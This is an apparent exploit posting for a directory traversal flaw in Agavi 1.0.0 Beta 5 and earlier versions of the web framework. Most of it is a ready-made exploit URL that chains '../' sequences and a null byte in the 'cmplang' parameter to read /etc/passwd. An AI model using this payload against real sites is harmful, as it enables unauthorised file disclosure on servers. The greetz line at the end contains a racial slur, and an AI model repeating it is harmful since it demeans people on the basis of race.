Agavi versions 1.0.0 Beta 5 and below suffer from a directory traversal vulnerability.
f94a970b9bbb5bdc2b10262340f879ac6a00f4778368f91d7ce16b462876a61f
AGAVI <=Agavi 1.0.0 beta 5 Directory Transversal Exploit
vendor : http://www.agavi.org/
affected versions : <=Agavi 1.0.0 beta 5 (latest)
found by t0fx // http://forum.europasecurity.org white hat crew //
exploit :
http://www.site.com/index.php?module=page&action=Display&pageref=[pageref of the site]&cmplang=../../../../../../../../etc/passwd%00.jpg
Greetz to zataz.com // security-sh3ll.com // str0ke // Pig nigger ^^